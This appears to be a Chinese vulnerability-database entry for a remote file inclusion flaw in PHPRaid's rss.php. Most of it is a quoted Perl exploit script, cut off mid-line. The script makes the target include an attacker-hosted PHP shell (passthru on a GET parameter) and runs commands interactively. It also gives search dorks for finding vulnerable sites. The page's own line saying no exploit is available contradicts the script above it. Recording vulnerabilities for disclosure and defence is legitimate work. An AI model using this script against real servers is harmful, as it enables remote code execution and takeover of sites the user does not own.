PHPRaid RSS.PHP远程文件包含漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

#!/usr/bin/perl # phpraid <= 3.x.x (rss.php) Remote File Inclusion Exploit # Download Script : http://up.9q9q.net/up/index.php?f=994a86950 # Founded & Coded by: Cold z3ro , Cold-z3ro@hotmail.com # Dork : inurl:"phpRaid" , "phpRaid" , "roster.php?Sort=Race" # perl cold-z3ro.pl <target> <cmd shell location> <cmd shell variable> # cmd shell example: <?passthru($_GET[cmd]);?> # Exploit : http://www.example.com/phpRaid_path/rss.php?phpraid_dir=Evil-script? ## use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} head(); while() { print "[shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Path.'rss.php?phpraid_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[....]/; if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";} elsif...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息